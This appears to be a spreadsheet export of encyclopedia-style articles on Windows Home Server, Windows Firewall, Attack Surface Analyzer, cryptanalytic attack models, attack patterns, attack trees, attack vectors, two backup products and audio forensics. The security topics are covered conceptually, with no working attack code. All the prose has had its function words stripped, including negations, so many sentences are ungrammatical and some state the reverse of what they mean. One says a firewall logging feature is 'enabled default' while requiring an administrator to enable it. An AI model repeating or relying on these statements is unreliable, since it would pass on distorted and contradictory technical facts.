extender's removal mainly related seen core feature windows home server reason adoption. replacement drive extender, microsoft stated oems would raid windows home server products. computer backup restore windows home server computer backup automatically backs computers home server using image-based system ensures point-in-time-based restoration either entire specific files folders. complete bare-metal restores initiated restore bootable file based restores initiated client software allows users open backup "drag drop" files this technology uses volume shadow services (vss) technology client computer take image based backup running computer. because backup operates data cluster level, single instancing performed minimize amount data travels network ultimately stored home server. this single instancing gives server ability store instance data, matter data originated another computer, another file, even data within file. computer backup images duplicated server, server hard drive fails, backups could lost. "server backup" feature added power pack include duplication backup images. remote file access system also offers secured browser based interface internet shared file stores. release version offers access interface free windows live-provided url, uses dynamic dns. interface also allows uploading downloading files content stores. however, limit single batch upload. remote desktop services system also supports terminal services gateway, allowing remote control desktop windows computer home network. currently supported systems would normally support remote desktop: windows professional, tablet media center editions, windows vista business, enterprise ultimate editions windows professional, enterprise ultimate editions. interface also supports embedding remote desktop activex control, provide remote access home computers within interface directly. remote sessions also connect home server console configure server internet. add-ins windows home server allows developers publish community commercial add-ins designed enhance windows home server added functionality. january 2010, nearly add-ins developed whs, including applications antivirus security, backups, disk management, automation, media, network/power management, remote access, bittorrent more. windows home server (software development kit) provides developers apis tools developing extending windows home server. compatibility windows home server features integration windows (sp2 newer), windows vista, windows (after release power pack software installation, either client network share. connector software also installed accessing yourserver:55000 browser, link provided download connector software install troubleshooting tools. files stored windows home server also available windows share, opening compatibility wide variety operating systems. also, administration console available remote desktop, allowing administration unsupported platforms. windows home server support microsoft security essentials.64-bit windows client support introduced power pack though restore wizard windows home server restore unable restore clients running 64-bit operating systems, fact restore support 64-bit drivers. windows professional officially supported. however, unofficial workarounds allow connector software work x64.integration file sharing service location time machine apparently considered, upon leopard's release, apple removed ability file sharing protocol time machine backups. provider, provides plug-in home server line capable time machine backup home server.windows home server officially supported domain controller capability cannot readily join windows server domain. wireless networking supported. dedicated devices operating system pre-installed supplied server recovery disk reloads network connection. this utilized mediasmart server, fujitsu siemens scaleo home server. resolved issues file corruption first release windows home server, (release manufacturing), suffered file corruption flaw whereby files saved directly edited shares device could become corrupted. only files ntfs alternate data streams susceptible flaw. flaw data corruption server heavy load time file (with ads) saved onto share.backups client made windows home server susceptible flaw.even though issue first acknowledged october 2007, microsoft formally warned users seriousness flaw december 2007. microsoft issued list applications, including windows live photo gallery, microsoft onenote, microsoft outlook synctoy 2.0, might triggered flaw used edit files share directly.this issue fixed power pack released july 2008. native backup windows home server include mechanism backing server. power pack added ability back files stored shared folders, external drive. users also subscribe 3rd-party online services, fee. however, remains back installed server operating system. backing-up client backup database available either manually using instructions provided microsoft page document done using bdbb add-in written alex kuretz available website. pricing while hardware manufacturers developed dedicated boxes, microsoft also released windows home server oem/system builder license. november 2008, microsoft lowered price system builder us$100.users also choose existing build systems, would include system builder. march 2009, microsoft also made windows home server available msdn microsoft technet subscribers.some computer systems available bundled windows home server license. case versions windows possible request refund license fees paid windows home server. also file server media server references further reading external links officialofficial website (from archive.org)</t>
  </si>
  <si>
    <t>Windows Firewall</t>
  </si>
  <si>
    <t>windows firewall (officially called windows defender firewall windows 10), firewall component microsoft windows. first included windows windows server 2003. prior release windows service pack 2004, known internet connection firewall. with release windows version 1709 september 2017, renamed windows defender firewall. overview when windows originally shipped october 2001, included limited firewall called "internet connection firewall". disabled default concerns backward compatibility, configuration screens buried away network configuration screens many users never looked result, rarely used. mid-2003, blaster worm attacked large number windows machines, taking advantage flaws windows service.[1] several months later, sasser worm something similar. ongoing prevalence worms 2004 resulted unpatched machines infected within matter minutes. because incidents, well criticisms microsoft active protecting customers threats, microsoft decided significantly improve functionality interface windows xp's built-in firewall, rebrand windows firewall, switched default since windows sp2. three profiles activated automatically network interface: public assumes network shared world restrictive profile. private assumes network isolated internet allows inbound connections public. network never assumed private unless designated local administrator. domain profile least restrictive. allows inbound connections allow file sharing etc. domain profile selected automatically connected network domain trusted local computer.security capabilities included, record addresses data relating connections originating home office network internet. record dropped packets successful connections. this used, instance, track every time computer network connects website. this security enabled default; administrator must enable it.windows firewall controlled/configured object-oriented api, scriptable netsh command, administration tool centrally group policies. features available regardless configured. versions windows neptune unreleased windows neptune, firewall introduced. similar found windows windows windows firewall first introduced part windows service pack every type network connection, whether wired, wireless, vpn, even firewire, firewall enabled default, built-in exceptions allow connections machines local network. also fixed problem whereby firewall policies would enabled network connection several seconds connection created, thereby creating window vulnerability. number additions made group policy, windows system administrators could configure windows firewall product company-wide level. xp's windows firewall cannot block outbound connections; capable blocking inbound ones. windows firewall turned significant reasons (the dcom activation security) many corporations upgrade service pack timely fashion. around time sp2's release, number internet sites reporting significant application compatibility issues, though majority ended nothing ports needed opened firewall components distributed systems (typically backup antivirus solutions) could communicate. windows firewall added ipv6, supported predecessor, internet connection firewall.note dcom problem solved moving applications dcomlab's combridge protocol. windows vista windows vista improved firewall address number concerns around flexibility windows firewall corporate environment: firewall based windows filtering platform. management console snap-in named windows firewall advanced security provides access many advanced options, enables remote administration. this accessed start control panel administrative tools windows firewall advanced security, running "wf.msc" outbound packet filtering, reflecting increasing concerns spyware viruses attempt "phone home". outbound rules configured using management console. notifications shown however outbound connections. with advanced packet filter, rules also specified source destination addresses port ranges. rules configured services service name chosen list, without needing specify full path file name. ipsec fully integrated, allowing connections allowed denied based security certificates, kerberos authentication, etc. encryption also required kind connection. improved interface managing separate firewall profiles. ability three separate firewall profiles computers domain-joined, connected private network, connected public network supports profiles—domain-joined standard). support creation rules enforcing server domain isolation policies. windows server 2008 windows windows server 2008 contains firewall windows vista. firewall windows server 2008 windows contains improvements, multiple active profiles. windows changes component windows are: change name occurred september 2017 update, known fall creators update (codename redstone firewall service (mpssvc) cannot stopped anymore. also list microsoft windows components security safety features windows vista personal firewall comparison firewalls references notes these multiple vulnerabilities fixed microsoft course several months; microsoft security bulletins ms03-026, ms03-039, ms04-012 cover detail. external links windows firewall advanced security microsoft technet</t>
  </si>
  <si>
    <t>Attack Surface Analyzer</t>
  </si>
  <si>
    <t>attack surface analyzer tool created analysis changes made attack surface operating systems since windows vista beyond. tool recommended microsoft guidelines verification stage development. history according microsoft team, tool checking changes made attack surface windows operating system attack surface analyzer developed. problem check verify effects various software installations system back since windows server 2003 developed. back multiple tools every type change made attack surface. painful process check everything using multiple tools. problem made microsoft create application developers could analyze changes made windows attack surface. first used developers microsoft. later, january 2011, beta version (version 5.1.3.0) tool named attack surface analyzer released public testers administrators. attack surface analyzer compare scan data system called baseline scan product scan. both 32-bit 64-bit versions software available windows vista windows (and respective server editions). there news windows version released. features analysis different threat categories attack surface analyzer tool analysis changes made various parts attack surface windows series operating system (includes windows vista windows using tool, analyze changes made registry, file permissions, windows server, assemblies done. according microsoft, tool engineers security team microsoft analyze effects software installation windows operating system. would possible tool. would different software different parts windows combine effects logically yourself. tool enlists various elements enumerates running system scan. elements are: files registry keys memory information windows windows firewall assemblies network shares logon sessions ports named pipes autorun tasks endpoints processes threads desktops handles microsoft internet information services serverthe list comprehensive elements possible well important elements changed software installed system. while software might change elements list, change different elements system. attack surface analyzer combines easier analyze parts. enlisting threats while attack surface analyzer tell changes sure, cases, also able tell particular change configuration causing threat. now, tool enlist threats categories parts operating system) scans few, noticeable issues services configurations, file system acls issues related processes running system. determining threat severity getting list threats system great thing software released microsoft itself. after all, knows windows better microsoft. with improved concerns security shown microsoft, important severity threat also known team enterprise. attack surface analyzer also shows severity threats finds. however, seems report severity every threat. instead shows severity threat category. example, severity threat caused “executables with weak acls” (threat severity level less caused “processes with impersonation tokens” (threat severity level surely desirable feature enlist level severity caused threat rather category belongs. there however, news might available. built help every organization experts various domains security. there case network security expert organization aware details terminology domain (say windows services). however, issues connected other. while possible (and case important) experts security expert teams know everything terms other, might required cases. brief description (along link technet library describing term detail) threats changes attack surface enlisted report generated attack surface analyzer. while brief description usually enough experts, might needed cases. microsoft made easy find right resource term rather relying upon search engines. organization changes made attack surface attack surface windows operating system concerns various parts operating system. would difficult anyone understand report changes listed serial order. attack surface analyzer makes easy user browse report listing threats categories providing table contents html page. report generation attack surface analyzer compare scan data (generated different scans) generate report, viewed html format. also possible scans system generate another system using tool. this good windows vista clients possible generate report using current version attack surface analyzer windows vista. case, attack surface analyzer used scans windows vista client, transfer scan result files computer running windows generate browse report windows based computer. system requirements attack surface analyzer works windows series operating systems report generation done version operating systems. following system requirements attack surface analyzer (from official download page): installable windows vista, windows windows server 2008 windows server 2008 collection attack surface data: windows vista, windows windows server 2008 windows server 2008 analysis attack surface data report generation: windows windows server 2008 microsoft .net microsoft enlisted hardware requirements separately. tool able perform machine meeting hardware requirements installed operating system. note, however, running time generation scan data report depends hardware capabilities (better hardware would work done faster). scans attack surface analyzer list types scans namely baseline scan product scan. strict technical terms scans same. difference logical, technical. baseline scan this scan user generate data initial system. this data compared product scan. after running baseline scan, product whose effect attack surface operating system checked installed. installation changes system configuration (possibly) installing services, changing firewall rules, installing .net assemblies baseline scan logical scan user using attack surface analyzer generates file containing configuration system software installed. product scan product scan signifies state system ‘product’ installed. context, product software whose effects system upon installation checked. generate report, scans required minimum. product scan would capture changes made system installation software product testing. scan data generated scan compared baseline scan data find changes made system configurations different points. worth note system state captured using attack surface analyzer combination used report generation. however ‘baseline scan’ taken other. automatically called product scan. also attack surface security development lifecycle software verification external links download attack surface analyzer attack surface analyzer unofficial microsoft's attack surface analyzer sheds light software vulnerabilities analyze attack surface using attack surface analyzer? attack surface analyzer windows software giant introduces technology consulting application security vulnerabilities attack surface trustworthy computing security development lifecycle (msdn article) references</t>
  </si>
  <si>
    <t>Attack model</t>
  </si>
  <si>
    <t>cryptanalysis, attack models attack types classification cryptographic attacks specifying kind access cryptanalyst system attack attempting "break" encrypted message (also known ciphertext) generated system. greater access cryptanalyst system, useful information utilize breaking cypher. cryptography, sending party uses cipher encrypt (transform) secret plaintext ciphertext, sent insecure communication channel receiving party. receiving party uses inverse cipher decrypt ciphertext obtain plaintext. secret knowledge required apply inverse cipher ciphertext. this secret knowledge usually short number string called key. cryptographic attack third party cryptanalyst analyzes ciphertext "break" cipher, read plaintext obtain future enciphered messages read. usually assumed encryption decryption algorithms public knowledge available cryptographer, case modern ciphers published openly. this assumption called kerckhoffs's principle. models some common attack models are: ciphertext-only attack (coa) type attack assumed cryptanalyst access ciphertext, access plaintext. this type attack likely case encountered real life cryptanalysis, weakest attack cryptanalyst's lack information. modern ciphers required resistant type attack. fact, successful cryptanalysis model usually requires cryptanalyst must information plaintext, distribution, language plaintexts written standard protocol data framing part plaintext, etc.brute force attack exhaustive search attack every possible tried correct found. every cipher except unbreakable information-theoretically secure methods like time vulnerable method, difficulty depend cipher length considered real cryptanalysis cipher. bits, possible keys try, brute-force attack recover cipher worst-case time proportional average time 2n-1. this often used standard comparison attacks. brute-force applied ciphertext-only settings, cryptanalyst must enough information plaintext least bits) allow identification correct tried. known-plaintext attack (kpa) type attack assumed cryptanalyst access least limited number pairs plaintext corresponding enciphered text. interesting example dates back world allies used known-plaintexts successful cryptanalysis enigma machine cipher. plaintext samples called "cribs"; term originated bletchley park, british world decryption operation. very early cribs produced stolen plaintext intercepted ciphertext, qualify classification known-plaintext attack. however, knowledge experience increased, known-plaintexts actually generated mostly series intelligent guesses based gained experience logic, channel providing direct access plaintext. technically latter attacks classified harder-to-execute ciphertext-only attacks. chosen-plaintext attack (cpa) attack cryptanalyst able choose number plaintexts enciphered access resulting ciphertext. this allows analyst explore whatever areas plaintext state space wish allow exploit vulnerabilities nonrandom behavior appear certain plaintexts. widely used public-key cryptosystems, used encrypt plaintext publicly distributed anyone allowing cryptanalyst create ciphertext plaintext want. public-key algorithms must resistant chosen-plaintext attacks. adaptive chosen-plaintext attack (cpa2) attack analyst choose sequence plaintexts encrypted access ciphertexts. step opportunity analyze previous results choosing next plaintext. this allows information choosing plaintexts required choose plaintexts beforehand required chosen-plaintext attack. chosen-ciphertext attack (cca) attack analyst choose arbitrary ciphertext access plaintext decrypted actual real life case would require analyst access communication channel recipient end. lunchtime attack midnight attack variant assumed cryptanalyst access system limited time limited number plaintext-ciphertext pairs, must show progress. name comes common security vulnerability employee signs encrypted computer leaves unattended lunch, allowing attacker limited-time access system. adaptive chosen-ciphertext attack (cca2) attack analyst choose series ciphertexts resulting plaintexts, opportunity step analyze previous ciphertext-plaintext pairs choosing next ciphertext. open model attacks attacker knowledge cipher attacked.related-key attack attack cryptanalyst access ciphertext encrypted plaintext using (unknown) keys related target mathematically defined way. example, analyst might know last bits keys identical. this relevant modern computer encryption protocols generate keys automatically, leading possibility relations them. wired equivalent privacy (wep) privacy protocol used protect wifi internet devices found vulnerable related-key attack weakness rc4. known-key distinguishing attack chosen-key distinguishing attack, attacker distinguish ciphertext random along knowledge ability choose key. side-channel attack this strictly speaking cryptanalytic attack, depend strength cipher. refers using data encryption decryption process gain information message, electronic noise produced encryption machines, sound produced keystrokes plaintext typed, measuring much time various computations take perform.different attack models used cryptographic primitives, generally kind security systems. examples attack models are: adaptive chosen-message attack digital signatures. references further reading niels ferguson; bruce schneier (2003). "introduction cryptography: attacks". carol long (ed.). practical cryptography (hardcover ed.). wiley publishing inc. 30–32. isbn 0-471-22894-x. susan hansche; john berti; chris hare (2004). cryptography: cryptoanalysis attacks". official (isc)² guide cissp exam (hardcover ed.). auerbach publications. 389–393. isbn 0-8493-1707-x. stinson, douglas july 2004). polemic notions cryptographic security". university waterloo centre applied cryptographic research. archived original 2011.</t>
  </si>
  <si>
    <t>Attack patterns</t>
  </si>
  <si>
    <t>computer science, attack patterns group rigorous methods finding bugs errors code related computer security. attack patterns often used testing purposes important ensuring potential vulnerabilities prevented. attack patterns used highlight areas need considered security hardening software application. they also provide, either physically reference, common solution pattern preventing attack. such practice termed defensive coding patterns. attack patterns define series repeatable steps applied simulate attack security system. categories there several different ways categorize attack patterns. group general categories, architectural, physical, external (see details below). another categorizing attack patterns group specific technology type technology (e.g. database attack patterns, application attack patterns, network attack patterns, etc. server attack patterns, oracle attack patterns, .net attack patterns, java attack patterns, etc.) using general categories architectural attack patterns used attack flaws architectural design system. these things like weaknesses protocols, authentication strategies, system modularization. these logic-based attacks actual bit-manipulation attacks. physical attack patterns targeted code itself. these things injection attacks, buffer overflows, race conditions, common forms attacks become popular news. external attack patterns include attacks trojan horse attacks, viruses, worms. these generally solvable software-design approaches operate relatively independently attacked program. however, vulnerabilities piece software lead attacks successful system running vulnerable code. example vulnerable edition microsoft server, allowed slammer worm propagate itself. approach taken attacks generally revise vulnerable code. structure attack patterns structured much like structure design patterns. using format helpful standardizing development attack patterns ensures certain information pattern always documented way. recommended structure recording attack patterns follows: pattern name label given pattern commonly used refer pattern question. type subtypes pattern type associated subtypes classification pattern. this allows users rapidly locate identify pattern groups deal security efforts. each pattern type, zero subtypes identify category attack pattern. typical types include injection attack, denial service attack, cryptanalysis attack, etc. examples typical subtypes denial service, example, would resource starvation, dos-system crash, dos-policy abuse. another important field ensure true patterns repeated unnecessarily. often easy confuse exploit attack. exploits created time attack patterns. buffer overflow attack pattern good example. there many known exploits viruses take advantage buffer overflow vulnerability. follow pattern. therefore, type subtype classification mechanism provides classify pattern. pattern creating unique type subtype, chances exploit existing pattern. this section also used indicate possible automate attack. possible automate attack, recommended provide sample sample attack code section described below. also known ascertain attacks known several different names. this field used list names. descriptionthis description attack itself, originated from. essentially free-form field used record information doesn’t easily fields. attacker intentthis field identifies intended result attacker. this indicates attacker’s main target goal attack itself. example, attacker intent bandwidth starvation attack make target site unreachable legitimate traffic. motivationthis field records attacker’s reason attempting attack. crash system order cause financial harm organization, execute theft critical data order create financial gain attacker. this field slightly different attacker intent field describes attacker want achieve intent listed attacker intent field, rather physical result attack. exploitable vulnerabilitythis field indicates specific type vulnerability creates attack opportunity first place. example integer overflow attack would integer-based input field checking size value incoming data ensure target variable capable managing incoming value. this vulnerability associated exploit take advantage order carry attack. participantsthe participants entities required attack succeed. this includes victim systems well attacker attacker’s tools system components. name entity accompanied brief description role attack interact other. process diagramthese diagrams attack visually explain attack executed. this diagram take whatever form appropriate recommended diagram similar system class diagram showing data flows components involved. dependencies conditionsevery attack must context operate conditions make attack possible. this section describes conditions required systems situations need place order attack succeed. example, attacker able execute integer overflow attack, must access vulnerable application. that common amongst attacks. however, vulnerability exposes target running remote server, would also condition would noted here. sample attack codeif possible demonstrate exploit code, section provides location store demonstration code. cases, denial service attack, specific code possible. however, overflow, cross site scripting type attacks, sample code would useful. existing exploitsexploits automated manual. automated exploits often found viruses, worms hacking tools. existing exploits known attack section used list reference exploits. these references internal corporate knowledge bases, external various cert, virus databases. exploits confused vulnerabilities. exploit automated manual attack utilises vulnerability. listing vulnerability found particular product example. follow-on attacksfollow-on attacks attacks enabled particular attack pattern. example, buffer overflow attack pattern, usually followed escalation privilege attacks, subversion attacks setting trojan horse /backdoor attacks. this field particularly useful researching attack identifying potential attacks carried mitigation typesthe mitigation types basic types mitigation strategies would used prevent attack pattern. this would commonly refer security patterns defensive coding patterns. mitigation types also used means classifying various attack patterns. classifying attack patterns manner, libraries developed implement particular mitigation types used mitigate entire classes attack patterns. these libraries used reused throughout various applications ensure consistent reliable coverage particular types attacks. recommended mitigationsince attack pattern, recommended mitigation attack listed brief. ideally, point user thorough mitigation pattern class attack. related patternsthis section subsections related patterns, mitigation patterns, security patterns, architectural patterns. these references patterns support, relate mitigate attack listing related pattern note that. example related patterns integer overflow attack pattern mitigation patterns filtered input pattern, self defending properties pattern related patterns buffer overflow pattern related alerts, listings publicationsthis section lists references related alerts listings publications listings common vulnerabilities exposures list, cert, sans, related vendor alerts. these listings hyperlinked online alerts listings order ensure references date information possible. cve: cwe: cert: [3]various vendor notification sites. further reading alexander, christopher; ishikawa, sara; silverstein, murray. pattern language. york, oxford university press, 1977 gamma, helm, johnson, vlissides, design patterns: elements reusable object-oriented software isbn 0-201-63361-2, addison-wesley, 1995 thompson, herbert; chase, scott, software vulnerability guide isbn 1-58450-358-0, charles river media, 2005 gegick, michael williams, laurie. “matching attack patterns security vulnerabilities software-intensive system designs.” sigsoft software engineering notes, proceedings 2005 workshop software engineering secure systems—building trustworthy applications sess '05, volume issue press, 2005 howard, leblanc, writing secure code isbn 0-7356-1722-8, microsoft press, 2002. moore, ellison, linger, attack modeling information security survivability, software engineering institute, carnegie mellon university, 2001 hoglund, greg mcgraw, gary. exploiting software: break code isbn 0-201-78695-8, addison-wesley, 2004 mcgraw, gary. software security: building security isbn 0-321-35670-5, addison-wesley, 2006 viega, john mcgraw, gary. building secure software: avoid security problems right isbn 0-201-72152-x, addison-wesley, 2001 schumacher, markus; fernandez-buglioni, eduardo; hybertson, duane; buschmann, frank; sommerlad, peter security patterns isbn 0-470-85884-2, john wiley sons, 2006 koizol, jack; litchfield, aitel, anley, eren, mehta, riley. shellcoder's handbook: discovering exploiting security holes isbn 0-7645-4468-3, wiley, 2004 schneier, bruce. attack trees: modeling security threats dobb’s journal, december, 1999 references fuzzdb:</t>
  </si>
  <si>
    <t>Attack tree</t>
  </si>
  <si>
    <t>attack trees conceptual diagrams showing asset, target, might attacked. attack trees used variety applications. field information technology, used describe threats computer systems possible attacks realize threats. however, restricted analysis conventional information systems. they widely used fields defense aerospace analysis threats tamper resistant electronics systems (e.g., avionics military aircraft). attack trees increasingly applied computer control systems (especially relating electric power grid). attack trees also used understand threats physical systems. some earliest descriptions attack trees found papers articles bruce schneier, counterpane internet security. schneier clearly involved development attack tree concepts instrumental publicizing them. however, attributions early publicly available papers attack trees also suggest involvement national security agency initial development. attack trees similar, identical, threat trees. threat trees discussed 1994 edward amoroso. basic attack trees multi-leveled diagrams consisting root, leaves, children. from bottom child nodes conditions must satisfied make direct parent node true; root satisfied, attack complete. each node satisfied direct child nodes. node child another node; case, becomes logical multiple steps must taken carry attack. example, consider classroom computers secured desks. steal one, securing cable must lock unlocked. lock unlocked picking obtaining key. obtained threatening holder, bribing keyholder, taking stored (e.g. mousemat). thus four level attack tree drawn, path (bribe keyholder, obtain key, unlock lock, steal computer). attack described node require many attacks described child nodes satisfied. condition shows conditions; however, condition created, example, assuming electronic alarm must disabled cable cut. rather making task child node cutting lock, tasks simply reach summing junction. thus path ((disable alarm, cable), steal computer) created. attack trees related established fault tree formalism. fault tree methodology employs boolean expressions gate conditions parent nodes satisfied leaf nodes. including priori probabilities node, possible perform calculate probabilities higher nodes using bayes rule. however, reality accurate probability estimates either unavailable expensive gather. with respect computer security active participants (i.e., attackers), probability distribution events probably independent uniformly distributed, hence, naive bayesian analysis unsuitable. since bayesian analytic techniques used fault tree analysis cannot legitimately applied attack trees, analysts instead techniques determine attacks preferred particular attacker. these involve comparing attacker's capabilities (time, money, skill, equipment) resource requirements specified attack. attacks near beyond attacker's ability perform less preferred attacks perceived cheap easy. degree attack satisfies adversary's objectives also affects attacker's choices. attacks within adversary's capabilities, satisfy goals, likely not. examination attack trees become large complex, especially dealing specific attacks. full attack tree contain hundreds thousands different paths leading completion attack. even trees useful determining threats exist deal them. attack trees lend defining information assurance strategy. important consider, however, implementing policy execute strategy changes attack tree. example, computer viruses protected refusing system administrator access directly modify existing programs program folders, instead requiring package manager used. this adds attack tree possibility design flaws exploits package manager. could observe effective mitigate threat attack tree mitigate close root possible. although theoretically sound, usually possible simply mitigate threat without implications continued operation system. example, threat viruses infecting windows system largely reduced using standard (non-administrator) account ntfs instead file system normal users unable modify operating system. implementing negates way, foreseen unforeseen, normal user come infect operating system virus; however, also requires users switch administrative account carry administrative tasks, thus creating different threats tree operational overhead. also, users still able infect files write permissions, include files documents. systems using cooperative agents dynamically examine identify vulnerability chains, creating attack trees, built since 2000. attack tree modeling software several commercial packages open source products available. open source adtool university luxembourg at-at seamonster commercial attacktree+ isograph securitree amenaza technologies risktree security also computer insecurity computer security computer virus fault tree analysis risk threat (computer) vulnerability (computing) references</t>
  </si>
  <si>
    <t>Attack vector</t>
  </si>
  <si>
    <t>computer security, attack vector specific path, method, scenario exploited break system, thus compromising security. term derived corresponding notion vector biology. attack vector exploited manually, automatically, combination manual automatic activity. often, multi-step process. instance, malicious code (code user consent performs actions user would consent often operates added harmless seeming document made available user. when unsuspecting user opens document, malicious code question (known payload) executed performs abusive tasks programmed execute, include things spreading further, opening unauthorized access system, stealing encrypting user's documents, etc. order limit chance discovery installed, code question often obfuscated layers seemingly harmless code.some common attack vectors: exploiting buffer overflows; blaster worm able propagate. exploiting webpages email supporting loading subsequent execution javascript types scripts without properly limiting powers. exploiting networking protocol flaws perform unauthorized actions network connection. phishing: sending deceptive messages users entice reveal confidential information, passwords. also references</t>
  </si>
  <si>
    <t>Attic (backup software)</t>
  </si>
  <si>
    <t>attic deduplicating backup software various unix-like operating systems. history attic development began 2010 accepted debian august 2013. attic available notably part debian, ubuntu, arch slackware. design attic offers efficient, deduplicated, compressed (optionally) encrypted authenticated backups. backup includes metadata like owner/group, permissions, posix acls extended file attributes. handles special files also like hardlinks, symlinks, devices files, etc. internally represents files archive stream metadata, similar unlike tools git. borg project created extensive documentation internal workings. attic uses rolling hash implement global data deduplication. compression defaults zlib, encryption (via openssl) authenticated hmac. borg 2015, attic forked "borg" support "more open, faster paced development", according developers. many issues attic fixed fork, backward compatibility original program lost non-reversible upgrade process exists). borg 1.0.0 released march 2016, borg 1.1.0 released october 2017. 2018, borg active development many contributors, attic developed. april 2021, attic website removed.stable releases available various linux distributions debian, ubuntu, fedora, opensuse others, ports collection various derivatives brew macos. project provides pre-built binaries linux, freebsd macos. also list backup software comparison backup software references external links official website borgbackup</t>
  </si>
  <si>
    <t>Attix5 Online Backup</t>
  </si>
  <si>
    <t>attix5 computing, online disk-to-disk backup solution. attix5 oldest managed online backup companies, powering smbs enterprises.on september 2015, attix5 acquired based cloud data management company redstor. redstor since renamed technology redstor pro. also list backup software remote backup service timeline computing references</t>
  </si>
  <si>
    <t>Audio forensics</t>
  </si>
  <si>
    <t>audio forensics field forensic science relating acquisition, analysis, evaluation sound recordings ultimately presented admissible evidence court official venue.audio forensic evidence come criminal investigation enforcement part official inquiry accident, fraud, accusation slander, civil incident.the primary aspects audio forensics establishing authenticity audio evidence, performing enhancement audio recordings improve speech intelligibility audibility low-level sounds, interpreting documenting sonic evidence, identifying talkers, transcribing dialog, reconstructing crime accident scenes timelines.modern audio forensics makes extensive digital signal processing, former analog filters obsolete. techniques adaptive filtering discrete fourier transforms used extensively. recent advances audio forensics techniques include voice biometrics electrical network frequency analysis. history possibility performing forensic audio analysis depends availability audio recordings made outside boundaries recording studio. first portable magnetic tape recorders appeared 1950s soon devices used obtain clandestine recordings interviews wiretaps, well record interrogations.the first legal case invoked forensic audio techniques u.s. federal courts united states mckeever case, took place 1950s. first time, judge mckeever case asked determine legal admissibility conversation recorded involved defendant.the federal bureau investigation (fbi) started implementing audio forensic analysis audio enhancement early 1960s.the field audio forensics primarily established 1973 watergate scandal. federal court commissioned panel audio engineers investigate gaps president nixon's watergate tapes, secret recordings u.s. president richard nixon made office. probe found nine separate sections vital tape erased. report gave rise techniques analyze magnetic tape. authenticity digital audio recording introduce many challenges authenticity evaluation. authenticity analysis digital audio recordings based traces left within recording recording process, subsequent editing operations. first goal analysis detect identify traces retrieved audio recording, document properties. second step, properties retrievable traces analysed determine support oppose hypothesis recording modified. access authenticity audio evidence examiner needs several types observation, checking recording capability, recording format, reviewing document history, listen entire audio. methods access digital audio integrity divided main categories: container-based technique content-based technique container analysis container analysis consists hash calculation, file format analysis. hash analysis: unique character string derived bits bytes audio file calculated mathematically derived hash function. these useful verify modifications occurred file moment hash calculation done next instance hash calculation. time stamps: using time stamps examiner detect date time creation file modifications, well last access time. time stamps generated interlock digital system, corrupted using copy/transfer operation editing operations. file format: analysis audio parameters embedded audio format (codec, sample rate, depth, etc..). header: scientists detect change recording using header information file format. depending device brand, information model, serial number, firmware version, time, date length recording determined internal clock settings). useful note time stamps compare date time claimed recordists file made. data: digital data file contain useful information examined hexadecimal reader ascii character viewer. block addresses audio information, titles external software, post-processing operations useful information displayed. content analysis content analysis central part digital forensic analysis process based content audio file find traces manipulation anti-forensic processing operations. content-based audio forensic techniques split following categories: electrical network frequency (enf) acoustic environment signature main article: electrical network frequency analysis electrical network frequency trusted robust audio forensic analyses.all digital recording devices sensitive induced frequency power supply turn provides identifiable waveform signature within recording. this applies mains-powered units portable devices latter used proximity transmission cables mains-powered equipment.the feature vector obtained using band‑pass filtering range 49‑51 without resampling audio file, separate waveform original recording. results plotted analyzed database provided power supplier prove disprove recording's integrity, thus providing evidential scientific authentication material analysis. acoustic environment signature main article: acoustic signature audio recording usually combination multiple acoustic signals, direct sources, indirect signals reflections, secondary sources, ambient noise. indirect signals, secondary sources ambient noise used characterize acoustic environment. hard work extrapolate acoustic cues audio recording. dynamic acoustic environment identification (aei) computed using estimate reverberation background noise. audio enhancement audio enhancement forensic process aims improving audio file intelligibility removing cleaning unwanted noise otherwise unintelligible recording.the forensic scientists remove noises without affecting original information present audio file. enhancement allows obtain better intelligibility file, crucial determine participation person crime.the core audio enhancement analysis detect noise problems extract original file. fact, noise reverse‑engineered exploited researched allow subsequent removal attenuation.the goals forensic audio enhancement are: increase accuracy transcriptions decrease listeners' fatigue increase speech intelligibility increase snrthe first step audio enhancement process critical listening: complete recording reviewed, order formulate sound forensic strategy. creating clones audio recording essential, since work never conducted master recording order original file able compare throughout complete enhancement process, original constantly referenced original, unprocessed recording, thus preventing over‑processing pre‑empting issues raised later within trial. following guidelines working procedures allows different specialist achieve results using processing.we divide interfering sound categories: stationary noise time-variant noise. stationary noise consistent character, continuous whine, hum, rumble, hiss. suppose stationary noise occupies frequency range differs signals interest, speech recording steady rumble frequency range case, possible apply fixed filter, bandpass filter, pass approximately speech bandwidth. usually speech bandwidth ranges khz. case stationary noise bandwidth occupies frequency range desired signal, simple separation filter helpful. however, still possible apply equalization improve audibility/intelligibility desired signal.the time-variant noise sources generally require complicated processing stationary noise sources often effectively suppressed. enhancement method audio enhancement realized time-domain, automatic gain control, frequency-domain methods, frequency selective filters spectral subtraction. automatic gain control time-domain enhancement usually involves gain adjustments normalize amplitude envelope recorded audio signal. typically used automatic gain control technique, gain compression/expansion technique, tries reach constant sound level playback: portions recording referable noise made quieter, low-amplitude signal passages amplified, loud passages attenuated left alone. common approach apply noise gate squelch process noisy signal. noise gate realized either electronic device designed purpose, software processing computer. noise gate compares short-time level input signal pre-determined level threshold. signal level threshold level, gate opens, signal through, otherwise signal level threshold, gate closes signal allowed pass. role examiner adjust threshold level speech pass gate noise signal, occurs silence parts, blocked. noise gate help listener understand signal perceived less noisy background sound gated pauses conversation. however, noise gate simple version cannot reduce noise level simultaneously boost signal present time gate open.then exist also advanced noise gate systems take advantage digital signal processing techniques execute gating separation different frequency bands. these advanced systems help examiner remove particular types noise hiss present audio recording. frequency-selective filters frequency-selective filters technique operates frequency domain. principle behind technique enhance quality recording selectively attenuating tonal components spectrum, power-related buzz signals. multi-band audio equalizer also helpful reducing out-of-band noise still retaining frequency band interest, speech frequency range. spectral subtraction spectral subtraction digital signal processing technique short-term noise spectrum estimated frame, subtracted spectrum short frames noisy input signal. spectrum obtained subtraction used reconstruct noise-reduced frame output signal. process continues subsequent frames create entire output signal overlap-add procedure.the effectiveness spectral subtraction relies ability estimate noise spectrum. estimate usually obtained input signal frame known contain background noise, pause sentences recorded conversation. sophisticated noise reduction methods combine concepts level detection time domain spectral subtraction frequency domain. additional signal models rules used separate signal components likely part desired signal likely additive noise. interpretation after authentication enhancement, audio file examined must evaluated interpreted determine importance investigation.for example case speech recording means preparing transcription audio content, identifying talkers, interpreting background sounds, on.in 2009, national academy sciences (nas) published report entitled strengthening forensic science united states: path forward. report highly critical many areas forensic science, including audio forensics, traditionally relied upon subjective analysis comparison. importance reliability forensic evidence depend upon variety contributions investigation. some level uncertainty nearly always present, usually audio forensic evidence interpreted objective subjective 